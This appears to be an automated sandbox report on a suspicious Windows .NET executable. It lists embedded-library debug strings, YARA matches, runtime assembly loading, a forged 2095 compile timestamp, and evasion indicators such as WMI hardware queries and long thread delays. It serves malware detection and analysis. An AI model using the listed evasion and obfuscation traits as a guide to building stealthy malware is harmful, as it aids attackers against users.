                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.Numerics.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: K6aOw2Jmji.exe
                            Source: Binary string: System.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.pdb* source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: ntkrnlmp.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.pdbh source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdbRSDSC source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Data.pdbH source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Windows.Forms.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9E50000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2161158898.00000267E9731000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2160038870.00000267E7549000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: winload_prod.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Net.Http.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Drawing.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr

                            Data Obfuscation

                            barindex
                            Source: K6aOw2Jmji.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Source: 0.2.K6aOw2Jmji.exe.267ea190000.6.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                            Source: 0.2.K6aOw2Jmji.exe.267ea190000.6.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                            Source: 0.2.K6aOw2Jmji.exe.26790071be8.1.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                            Source: 0.2.K6aOw2Jmji.exe.26790071be8.1.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: K6aOw2Jmji.exeStatic PE information: 0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B88785E push eax; iretd 0_2_00007FFD9B88786D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8877F3 pushad ; iretd 0_2_00007FFD9B88785D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8876FD pushad ; iretd 0_2_00007FFD9B88785D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeMemory allocated: 267E8DC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeMemory allocated: 267E8FC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598153Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598140Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598031Jump to behavior
